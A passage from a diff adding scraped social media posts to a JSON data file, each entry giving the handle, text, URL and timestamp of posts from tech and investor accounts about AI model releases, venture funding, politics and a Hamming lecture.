+ "url": "https://x.com/eladgil/status/2048230781739581745", + "published_at": "2026-04-26T02:40:47+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "RT by @sama: That's exactly my view too, roughly compresses 2 weeks of our previous jobs to 1 day", + "url": "https://x.com/sama/status/2048224374264885396", + "published_at": "2026-04-26T02:15:19+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "how can they write code so fast?!", + "url": "https://x.com/sama/status/2048165186482389253", + "published_at": "2026-04-25T22:20:08+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "R to @sama: (and we will fix the former)", + "url": "https://x.com/sama/status/2048160448340767038", + "published_at": "2026-04-25T22:01:18+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "we still get looksmaxxed on frontend a little but we IQmog hard now", + "url": "https://x.com/sama/status/2048160404376105179", + "published_at": "2026-04-25T22:01:08+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "x.com/i/spaces/1nGeLyjZrkvKX", + "url": "https://x.com/jason/status/2048151434928017429", + "published_at": "2026-04-25T21:25:29+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "RT by @charliebilello: New video is up: \n\n📈The Week in Charts - breaking down the most important charts and themes in markets...\n\nhttps://www.youtube.com/watch?v=p5e0ThPjIAg", + "url": "https://x.com/charliebilello/status/2048128721286992166", + "published_at": "2026-04-25T19:55:14+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: OPINION: \"Trump’s mismanagement has resulted in death, destruction, wasted tax dollars, and a huge loss in respect for the United States — all to accomplish nothing.\" https://ebx.sh/V5TJjQ", + "url": "https://x.com/ylecun/status/2048118689258487857", + "published_at": "2026-04-25T19:15:22+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "nightmare blunt rotation", + "url": "https://x.com/jason/status/2048116521436590260", + "published_at": "2026-04-25T19:06:45+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "today #knicks \n\n@mikal_bridges to 6th man/leads the bench in scoring \n\nKnicks play @23savage____ 26 minutes, he has 5 offensive boards \n\nWe're up 20+ points in the second half \n\n@ATLHawks backs broken; they realize we've figured it out \n\nseries over \n\n@nyknicks in six", + "url": "https://x.com/jason/status/2048116362766127514", + "published_at": "2026-04-25T19:06:07+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: .@POTUS: \"We want to beat China at the industry. We're leading with crypto, we're leading with AI, and I really feel I have an obligation... as a President, I have to be able to make sure that all of our industries do well. Crypto's a big industry.\"", + "url": "https://x.com/DavidSacks/status/2048111588930986354", + "published_at": "2026-04-25T18:47:09+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "RT by @Jason: AngelList introduced USVC: venture investing for non-accredited investors starting at $500. Hear why Jason thinks the social media criticisms lack merit and says: \"More liquidity for investors is always a good thing. Let a thousand flowers bloom.”\n\nPlus:\n\n💰 Was the NYT wrong to host a discussion about “micro-looting”?\n\n🪖 A Special Forces soldier was insider trading on Polymarket… does it matter who he bet on?\n\n💵 Why rich families teach their kids about finance but public schools don’t.\n\nIt’s a TWiST Saturday special!\n\n0:00 Intro\n1:18 Naval's $500 VC Fund Explained\n5:54 Should You Trust Critics With 2K Followers?\n7:21 Learn By Betting — Jason's Philosophy\n10:10 Northwest Registered Agent - Get more when you start your business with Northwest. In 10 clicks and 10 minutes, you can form your company and walk away with a real business identity — Learn more at https://www.northwestregisteredagent.com/twist\n12:30 The Maduro Polymarket Scandal\n13:28 Should the Military Bet on Missions?\n19:55 LinkedIn Jobs - Hire right, the first time. Post your first job and get $100 off towards your job post at https://LinkedIn.com/twist\n29:32 NYT Defends Theft & \"Social Murder\"\n30:28 There Is No Moral Equivalence\n33:41 The Nepo Baby Behind the Article\n35:42 Prof G's \"Resist & Unsubscribe\" Movement\n37:54 Walk The Walk — Hasan, Bernie & Performative Outrage\n44:49 Teaching Kids About Money\n48:21 The Rich Get Richer & The Poor Stay Poor\n49:31 Outro\n\ncc: @Jason, @Lons, @AngelList, @Naval, @Polymarket, @nytimes\n\n🎥 Watch the full episode here 👇", + "url": "https://x.com/jason/status/2048099001782985057", + "published_at": "2026-04-25T17:57:08+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: When MTV News shut down, it felt like decades of culture vanished overnight 🕳️\n\nBut over 470,000 pages were already preserved.\n\nThat history didn’t disappear.\nIt was archived.\n\n📚 Read VANISHING CULTURE to see why it matters\n📖 Download & read: https://archive.org/details/vanishing-culture-2026\n🛒 Purchase in print: https://www.betterworldbooks.com/product/detail/vanishing-culture-a-report-on-our-fragile-cultural-record-9798995425014/new\n\n#VanishingCulture #DigitalMemory #InternetArchive #MTVNews #BookTwitter", + "url": "https://x.com/ylecun/status/2048069805807128734", + "published_at": "2026-04-25T16:01:07+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "5.5 is so earnest\n\n\"little engine that could\" energy", + "url": "https://x.com/sama/status/2048062261584077149", + "published_at": "2026-04-25T15:31:08+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: Journalists worldwide should stand up for colleagues who are murdered.", + "url": "https://x.com/paulg/status/2048043843690561556", + "published_at": "2026-04-25T14:17:57+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: Probably the best take I have heard on why there is so much fear around software exposure in private equity and credit because of AI\n\nFrom David Sacks\n\n\"Historically we only had two good exits for software businesses. One was IPO. The other was M&A. Then these big private equity shops came along and gave us a third potential exit. You would sell to them and then they would raise the capital based on one third equity and two third debt. So it was debt financed buyouts. \n\nIt is something that has been around in the non technology part of the economy for a long time but was a relatively new entrant in the world of technology. And the reason for that is if you have debt financed a purchase, you need to have very stable cash flows. \n\nBecause if you miss and you cant pay your interest on the debt, you will lose all your equity because the debt holders will foreclose. \n\nIt was belief for a long time that software did have predictable cash flows, at least for the mature businesses.\"", + "url": "https://x.com/DavidSacks/status/2048037985765949537", + "published_at": "2026-04-25T13:54:41+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "RT by @charliebilello: \"No one has ever been a success betting against America since 1776 — and they're not going to be a success in the future doing it, either.\" – Warren Buffett", + "url": "https://x.com/charliebilello/status/2048032027513864212", + "published_at": "2026-04-25T13:31:00+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "Edith and Shahed from Noora Health came to visit. They've saved over 75,000 lives so far. A small city of people.", + "url": "https://x.com/paulg/status/2048024967996993760", + "published_at": "2026-04-25T13:02:57+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: Here's YC's official advice about being truthful and precise about what is pilot, bookings, revenue and recurring revenue. \n\nFounders, particularly first time founders, need to sear this into their brains. Don't mistake one tier for another. Be precise, and always be truthful.", + "url": "https://x.com/paulg/status/2048017824895909901", + "published_at": "2026-04-25T12:34:34+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "Whoah, self-driving cars compete with airlines. I never considered that till now.", + "url": "https://x.com/paulg/status/2048017345000415744", + "published_at": "2026-04-25T12:32:40+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: 23 years old with no advanced mathematics training solves Erdős problem with ChatGPT Pro. \"What’s beginning to emerge is that the problem was maybe easier than expected, and it was like there was some kind of mental block.”-Terence Tao https://www.scientificamerican.com/article/amateur-armed-with-chatgpt-vibe-maths-a-60-year-old-problem/", + "url": "https://x.com/paulg/status/2047992864118894954", + "published_at": "2026-04-25T10:55:23+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: GitHub outages since Microsoft acquisition 🤣", + "url": "https://x.com/paulg/status/2047957234664030380", + "published_at": "2026-04-25T08:33:48+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "Hamming's talk is so important that I reproduced it on my site. It's one of the only things on my site written by someone else.\n\nhttps://paulgraham.com/hamming.html", + "url": "https://x.com/paulg/status/2047944827887591681", + "published_at": "2026-04-25T07:44:30+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "R to @paulg: Auction houses could fix this by giving you timegrapher numbers. But the only auction house that does this so far is a small Swiss one that specializes in watches (Ineichen). None of the big houses do.", + "url": "https://x.com/paulg/status/2047942555254288757", + "published_at": "2026-04-25T07:35:28+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "The best way to buy art is at auction, once you know what you're doing. But old watches you should buy from dealers. You can get enough information about paintings to judge their condition, but you have no idea what's inside watches.", + "url": "https://x.com/paulg/status/2047941243234107691", + "published_at": "2026-04-25T07:30:15+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: Incredible return on investment! 💰💰💰", + "url": "https://x.com/DavidSacks/status/2047877294476116184", + "published_at": "2026-04-25T03:16:09+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "SPLC invested $270k in Charlottesville and got $81 million in additional donations. Extraordinary returns.", + "url": "https://x.com/DavidSacks/status/2047871382923469241", + "published_at": "2026-04-25T02:52:39+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "Marc Benioff is the apex cloud founder. He and Salesforce have turned every previous technology wave to their advantage. Cloud, social, mobile, big data. I predict AI will be no different.", + "url": "https://x.com/DavidSacks/status/2047867592790946189", + "published_at": "2026-04-25T02:37:36+00:00", + "source": "nitter" + }, + { + "handle": "svwang1", + "account": "@svwang1", + "name": "王川(硅谷)", + "title": "自 2021年创立到 2026年三月初累积收入 (不是利润)五十亿美元出头的 anthropic, 在二级市场的估值已经超过一万亿美元。 \n\n2025年经营现金流 459亿美元, 税后利润 669亿美元的 Berkshire, 市值也是一万亿美元。", + "url": "https://x.com/svwang1/status/2047858045057909226", + "published_at": "2026-04-25T01:59:39+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: SACKS: “We're really lucky that [Trump] is President … when this AI revolution is happening.”\n\nJASON: “What would happen if Kamala ‘Ding Dong’ was in right now?”\n\nSACKS: “We'd have no data centers, they'd be using AI to censor us, and they'd be promoting DEI values through AI.”", + "url": "https://x.com/DavidSacks/status/2047842000632713369", + "published_at": "2026-04-25T00:55:54+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "this was a good week.\n\nproud of the team.\n\nhappy building!", + "url": "https://x.com/sama/status/2047823357635354814", + "published_at": "2026-04-24T23:41:49+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: David Sacks: We're lucky that Trump's the President when this AI revolution is happening.\n\n@Jason \"Do an alt history, Sacks, what would happen if Kamala Ding Dong was in right now?\"\n\n@DavidSacks \"We'd have no data centers, and they'd be using AI to censor us, and they'd be promoting DEI values through AI. That was in the Biden executive order.\n\nPresident Trump just wants the country to win and be successful.", + "url": "https://x.com/DavidSacks/status/2047823154655932696", + "published_at": "2026-04-24T23:41:01+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: POD UP! Core four is back 🚨\n\nBig show:\n\n-- SpaceX-Cursor deal, using compute as leverage\n\n-- SaaS debt bomb coming to PE?, venture debt risk\n\n-- Software bloodbath, buy low potential?\n\n-- New Apple CEO: future of the company\n\n-- SPLC indictment, major allegations, out of control NGOs\n\n-- Science Corner returns! Colon cancer cause discovered?\n\n(0:00) Bestie intros!\n\n(4:55) SpaceX-Cursor deal, compute as leverage\n\n(18:33) SaaS bloodbath, debt bomb incoming, buy the dip?\n\n(46:20) New Apple CEO: John Ternus succeeds Tim Cook, what's next for Apple?\n\n(1:00:32) SPLC indictment, out of control NGOs\n\n(1:19:03) Science Corner: Potential cause discovered for colon cancer spike in young people", + "url": "https://x.com/DavidSacks/status/2047808256047821141", + "published_at": "2026-04-24T22:41:49+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "This week I got to sit down with two truly generational CEOs and ask them anything: \n\n@tobi @Shopify ($160BN Market Cap)\n\nAdam Foroughi @AppLovin ($160BN Market Cap)\n\nI have the best job in the world.", + "url": "https://x.com/HarryStebbings/status/2047792195868967172", + "published_at": "2026-04-24T21:38:00+00:00", + "source": "nitter" + }, + { + "handle": "AravSrinivas", + "account": "@AravSrinivas", + "name": "Aravind Srinivas", + "title": "You would consume less computer credits (and be able to run more tasks as a result) if you switched to GPT-5.5 as your default orchestrator. This was the number one complaint about Computer (being credits/token hungry). GPT 5.5 is more token-efficient in subagent orchestration.", + "url": "https://x.com/AravSrinivas/status/2047788775468908840", + "published_at": "2026-04-24T21:24:24+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "GPT-5.5 and GPT-5.5 Pro are now available in the API!", + "url": "https://x.com/sama/status/2047787124846653895", + "published_at": "2026-04-24T21:17:51+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: Number of people who go bankrupt every year because of medical bills or illness-related work loss:\n\n🇦🇺 0\n🇨🇦 0\n🇩🇰 0\n🇫🇮 0\n🇫🇷 0\n🇩🇪 0\n🇮🇸 0\n🇮🇪 0\n🇮🇹 0\n🇯🇵 0\n🇳🇱 0\n🇳🇴 0\n🇵🇹 0\n🇪🇸 0\n🇸🇪 0\n🇬🇧 0\n🇺🇸 530,000\n\nThere’s a lesson there.", + "url": "https://x.com/ylecun/status/2047780272297382384", + "published_at": "2026-04-24T20:50:37+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: BREAKING: A Syrian billionaire needed U.S. sanctions lifted so he could cash in on $12 billion in reconstruction contracts, per NYT.\n\nIn an attempt to influence American foreign policy, he proposed a Trump-branded golf course, cut Jared Kushner & Ivanka Trump into a multibillion-dollar real estate deal for a resort in Albania, and had someone physically deliver a stone engraved with the Trump family crest to a Republican Member of Congress with instructions to take it to the White House to get the President's attention.\n\nTrump threw his weight behind repealing the sanctions. They were lifted. The contracts are moving, and the Trump family’s deals are expanding.", + "url": "https://x.com/paulg/status/2047761493274571036", + "published_at": "2026-04-24T19:36:00+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: New episode of The Information Bottleneck is out, this time with @liuzhuang1234 (Princeton).\n\nWe talked about ConvNeXt and whether architecture still matters; dataset bias and what \"good data\" actually looks like; ImageBind and why vision is the natural bridge across modalities; CLIP's blind spots; memory as the real bottleneck behind the agent hype; whether LLMs have world models; and Transformers Without Normalization.\n\nFor years, the vision community debated what actually matters: architecture, inductive bias, self-attention vs convolution. After a lot of back-and-forth, we ended up in a funny place: ViT and ConvNet give roughly the same performance once you tune the details.\n\nWhat I find interesting is that once you reach a certain performance level, it becomes much easier to swap and tweak components without really changing the outcome.\n\nTalking to Zhuang on this episode, I kept wondering whether the same is now true for LLMs. If we wil spent serious time on an alternative architecture today, would you actually get a meaningfully different model, or just land on the same Pareto curve with extra steps?\n\nI'm starting to suspect it's the latter. Architecture matters less than we think. Data, compute, and a handful of pillars do most of the work.", + "url": "https://x.com/ylecun/status/2047760455679246500", + "published_at": "2026-04-24T19:31:52+00:00", + "source": "nitter" + }, + { + "handle": "AravSrinivas", + "account": "@AravSrinivas", + "name": "Aravind Srinivas", + "title": "We’re rolling out GPT 5.5 as the default orchestrator model for Perplexity Computer. We will be monitoring the user sentiment compared to Opus 4.7 as the default as the rollout expands. Let us know your feedback!", + "url": "https://x.com/AravSrinivas/status/2047753276888854595", + "published_at": "2026-04-24T19:03:21+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "RT by @eladgil: Adopting Claude speak in my regular life, episode 1:\n\nPartner: Did you do the dishes tonight?\nMe: Yes they're done.\nPartner: Why are they still dirty?\nMe: You're right to push back. I didn't actually do them.", + "url": "https://x.com/eladgil/status/2047748613976264835", + "published_at": "2026-04-24T18:44:49+00:00", + "source": "nitter" + }, + { + "handle": "AravSrinivas", + "account": "@AravSrinivas", + "name": "Aravind Srinivas", + "title": "RT by @AravSrinivas: GPT-5.5 is now available on Perplexity for Max subscribers.\n\nGPT-5.5 is also rolling out as the default orchestration model in Computer for both Pro and Max subscribers.", + "url": "https://x.com/AravSrinivas/status/2047748486767272243", + "published_at": "2026-04-24T18:44:19+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: The web is disappearing 🕳️\n\nAccording to a Pew Research Center report, 26% of pages from 2013-2023 are no longer accessible.\n\nBut that’s not the whole story.\n\nIn a new study published in Internet Archive's book, VANISHING CULTURE, data scientists working with the Wayback Machine have found:\n16% have been restored through the Wayback Machine.\n56% are preserved before they disappear.\n\nPreservation is the remedy for cultural loss.\n\n📚 Read VANISHING CULTURE free from the Internet Archive \n\n📖 Download & read: https://archive.org/details/vanishing-culture-2026\n🛒 Purchase in print: https://www.betterworldbooks.com/product/detail/vanishing-culture-a-report-on-our-fragile-cultural-record-9798995425014/new \n\n#VanishingCulture #DigitalMemory #InternetArchive #BookTwitter", + "url": "https://x.com/ylecun/status/2047733594064408894", + "published_at": "2026-04-24T17:45:08+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "R to @DavidSacks: UPDATE: the DOJ has joined @xAI’s lawsuit against Colorado on First Amendment grounds. AI models should not be required to alter truthful output to comply with DEI.", + "url": "https://x.com/DavidSacks/status/2047717649849659586", + "published_at": "2026-04-24T16:41:47+00:00", + "source": "nitter" + }, + { + "handle": "svwang1", + "account": "@svwang1", + "name": "王川(硅谷)", + "title": "投资巴菲特的 Berkshire Hathaway 不能让你暴富,但可以让已经富的人继续富下去。\n\n投资 AI 公司,也许可以让你暴富,但更大的几率是全部亏光。", + "url": "https://x.com/svwang1/status/2047703469063377001", + "published_at": "2026-04-24T15:45:26+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: David Sacks on Anthropic-Pentagon dispute, Musk-Altman feud and SpaceX-Cursor deal:\nhttps://cnb.cx/4d3HAKp", + "url": "https://x.com/DavidSacks/status/2047703023690924289", + "published_at": "2026-04-24T15:43:39+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: 图灵奖获得者、 AI 三大教父之一的 LeCun在达沃斯的发言,算是把整个硅谷的遮羞布扯了。\n\n他说现在整个行业都被LLM彻底洗脑了,所有人都在同一条赛道上互相挖人,谁敢偏离主流谁就被骂落后。\n\n这也是他离开Meta的真正原因,连Meta都已经LLM-pilled,他不想再跟风了。\n\n最扎心的一句话是:纯生成式架构,不管是LLM、VLM还是VLA,永远造不出哪怕猫级的智能体。\n\n因为它们本质上只是下一个token预测机,只能在文字和像素的空间里做统计关联,从来没有真正理解过这个世界的因果。\n它们不会预测行动的后果,不会真正的规划,更没有常识。\n\n当然,我不是说LLM没用,短期来看,scaling LLM+微调+工具调用,已经能吃掉80%的白领工作,硅谷所有人往这里冲,也算是完全理性,毕竟钱和机会就在这里。\n\n但长期来看,这是一条有天花板的路。因为你永远不可能在文字地图上,开出一辆真正的车。\n机器人、具身智能、长期自主代理、真正的科学发现,这些坎,纯LLM永远跨不过去。\n\nLeCun说,真正的智能必须有世界模型。就是说给定当前的状态和你要做的动作,你要能准确预测下一秒世界会变成什么样。不是简单的像素级的生成,还需要对物理规律和因果关系的抽象建模。\n\n最近Figure、特斯拉、谷歌的机器人项目,其实都在偷偷补这一课,只是没人愿意公开说,LLM不是万能地基。\n\n我理解未来真正的智能,一定是混合栈,LLM负责语言交互和符号推理,世界模型负责因果预测和长期规划,执行层负责把计划变成动作。\n\nLeCun从来没说过要抛弃LLM,他只是反对把LLM当成一切的答案。\n\n硅谷现在最可怕的问题不是卷,是所有人都在同一条赛道上卷得太狠,以至于忘了终点其实根本不在这条赛道上。\n\n世界模型这道坎,迟早要跨。\n而谁先跨过去,谁就是下一个时代的赢家。\n#YannLeCun #世界模型 #AGI #大模型 #具身智能", + "url": "https://x.com/ylecun/status/2047697898989572176", + "published_at": "2026-04-24T15:23:18+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: .@DavidSacks: \"We know that @AnthropicAI makes good products. They are smart people, there’s no question about it... we don’t care what their personal views are. What we care about are the quality of their products, and we don’t want the bias creeping into the products.\"", + "url": "https://x.com/DavidSacks/status/2047694657107165519", + "published_at": "2026-04-24T15:10:25+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "How Claude Design Will Hurt Figma\n\n\"Claude Design will not replace Figma directly, but it will chip away at it.\n\nIt removes the need to wait for designers by letting people go straight from idea to product.\n\nThat bypass is the real threat, not a head-on competitor.\" @jasonlk\n\nLove to hear your thoughts on this @zoink @andrew__reed @karrisaarinen", + "url": "https://x.com/HarryStebbings/status/2047693043080261672", + "published_at": "2026-04-24T15:04:00+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "🫶", + "url": "https://x.com/sama/status/2047683787828703289", + "published_at": "2026-04-24T14:27:13+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: A mathematician who shared an office with Claude Shannon at Bell Labs gave one lecture in 1986 that explains why some people win Nobel Prizes and other equally smart people spend their whole lives doing forgettable work.\n\nHis name was Richard Hamming. He won the Turing Award. He invented error-correcting codes that made modern computing possible. And he spent 30 years at Bell Labs sitting in a cafeteria at lunch watching which scientists became legendary and which ones faded into nothing.\n\nIn March 1986, he walked into a Bellcore auditorium in front of 200 researchers and told them exactly what he had seen.\n\nHere's the framework that has been quoted by every serious scientist for the last 40 years.\n\nHis opening line landed like a punch. He said most scientists he worked with at Bell Labs were just as smart as the Nobel Prize winners. Just as hardworking. Just as credentialed. And yet at the end of a 40-year career, one group had changed entire fields and the other group was forgotten by the time they retired.\n\nHe wanted to know what the difference actually was. And he said it wasn't luck. It wasn't IQ. It was a specific set of habits that almost nobody is willing to follow.\n\nThe first habit was the one that hurts the most to hear. He said most scientists deliberately avoid the most important problem in their field because the odds of failure are too high. They pick a safe adjacent problem, solve it cleanly, publish it, and move on. And because they never swing at the hard problem, they never hit it. He said if you do not work on an important problem, it is unlikely you will do important work. That is not a motivational line. That is a logical one.\n\nThe second habit was about doors. Literal doors. He noticed that the scientists at Bell Labs who kept their office doors closed got more done in the short term because they had no interruptions. But the scientists who kept their doors open got more done over a career. The open-door scientists were interrupted constantly. They also absorbed every new idea passing through the hallway. Ten years in, they were working on problems the closed-door scientists did not even know existed.\n\nThe third habit was inversion. When Bell Labs refused to give him the team of programmers he wanted, Hamming sat with the rejection for weeks. Then he flipped the question. Instead of asking for programmers to write the programs, he asked why machines could not write the programs themselves. That single inversion pushed him into the frontier of computer science. He said the pattern repeats everywhere. What looks like a defect, if you flip it correctly, becomes the exact thing that pushes you ahead of everyone else.\n\nThe fourth habit was the one that hit me the hardest. He said knowledge and productivity compound like interest. Someone who works 10 percent harder than you does not produce 10 percent more over a career. They produce twice as much. The gap doesn't add. It multiplies. And it compounds silently for years before anyone notices.\n\nHe finished the lecture with a line I have never been able to shake.\n\nHe said Pasteur's famous quote is right. Luck favors the prepared mind. But he meant it literally. You don't hope for luck. You engineer the conditions where luck can land on you. Open doors. Important problems. Inverted questions. Compounded hours. Those are not traits. Those are choices you make every single day.\n\nThe transcript has been sitting on the University of Virginia's computer science website for almost 30 years. The video is free on YouTube. Stripe Press reprinted the full lectures as a book in 2020 and Bret Victor wrote the foreword.\n\nHamming died in 1998. He gave his final lecture a few weeks before. He was 82.\n\nThe lecture that explains why some careers become legendary and others disappear is still free. Most people who could benefit from it will never open it.", + "url": "https://x.com/ylecun/status/2047680485208531152", + "published_at": "2026-04-24T14:14:06+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: Feel like very few serious people make the argument Britain should develop its own LLM? Certainly not an argument you see made in Westminster often during the sovereignty debate. \n\nAlso some other eyebrow-raising sections in this interview.", + "url": "https://x.com/ylecun/status/2047676640059154653", + "published_at": "2026-04-24T13:58:49+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "R to @DavidSacks: Full article:\n\nhttps://www.wsj.com/lifestyle/careers/are-college-graduates-finally-catching-a-break-in-this-job-market-38c37541?st=fxk6Dg&reflink=article_copyURL_share", + "url": "https://x.com/DavidSacks/status/2047672359377588241", + "published_at": "2026-04-24T13:41:49+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "Narrative violation: Hiring of new college graduates is up 5.6% over last year. Youth unemployment for degreed 20–24‑year‑olds fell to 5.3% from 8.9%. Weren’t we told that 50% of entry-level jobs were going away?", + "url": "https://x.com/DavidSacks/status/2047671706660073767", + "published_at": "2026-04-24T13:39:13+00:00", + "source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "R to @JeffDean: The Arxiv for the new Decoupled DiLoCo paper is now up: https://arxiv.org/abs/2604.21428v1", + "url": "https://x.com/JeffDean/status/2047665074471387456", + "published_at": "2026-04-24T13:12:52+00:00", + "source": "nitter" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "RT by @naval: Fundrise VCX is exactly why USVC needs to exist.\n\nRetail wants access to OpenAI, Anthropic, SpaceX, xAI, etc. That demand is not going away.\n\nVCX turned that demand into a liquid public wrapper that still trades around 4-5x NAV.\n\nAt today’s ~$90 price vs. recent NAV references around ~$19, buyers may be paying roughly $4-5 for every $1 of actual private tech exposure.\n\nAccess at the wrong price is not access. It’s just scarcity monetized.\n\nYes, venture has fees. It always has. You pay for access, selection, and portfolio construction.\n\nBut paying venture fees is very different from paying 4-5x NAV for the wrapper before the venture return even happens.\n\nThe companies inside VCX can be great and retail can still get wrecked if the premium collapses.\n\nUSVC is the cleaner answer: diversified private tech exposure, SEC-registered, available to unaccredited investors, and bought around NAV instead of through a hyped public wrapper trading miles above its assets.\n\nThe real test for me is simple: my mom wants to invest in startups/private tech.\n\nI would rather she do USVC 100x over VCX, because at least with USVC I can understand the structure, explain the tradeoffs, and know she is not just paying a massive public-market hype premium for the wrapper.\n\nIn venture, access matters.\n\nBut the wrapper can still ruin the investment. And right now, some products are monetizing retail demand for private AI/startup exposure more than they are solving it.\n\nUSVC is at least aimed at the right problem.", + "url": "https://x.com/naval/status/2047645157080658335", + "published_at": "2026-04-24T11:53:43+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: 1. I never said LLMs were not useful. They are, particularly with all the bells and whistles that are being added to them. I use them.\n2. A robot-rich future can't be built with AIs that don't understand the physical world and don't anticipate the consequences of their actions. And LLMs really don't.\n3. The future in the cartoon looks pretty dystopian TBH, but even a non-dystopian version will require world models and zero-shot planning abilities.\n4. I rarely wear a suit and absolutely never wear a tie.\n5. I would never ever place a coffee mug on top of a piece equipment.\n6. I hope I'll look this young in 2032.", + "url": "https://x.com/ylecun/status/2047636569767419951", + "published_at": "2026-04-24T11:19:36+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: 🎓 Register now for ML & Advanced Stats Summer School, an intensive set of courses on theoretical foundations & applications of ML methods & modern stats analysis techniques.\n\nWith @ELLISUnitMadrid.\n\n📍 Madrid 🇪🇸 \n📅 June 8-19th\n⏰ Apply by June 3rd\n🔗 https://cig.fi.upm.es/mlas/", + "url": "https://x.com/ylecun/status/2047624126047670758", + "published_at": "2026-04-24T10:30:09+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: 🔴 Trump 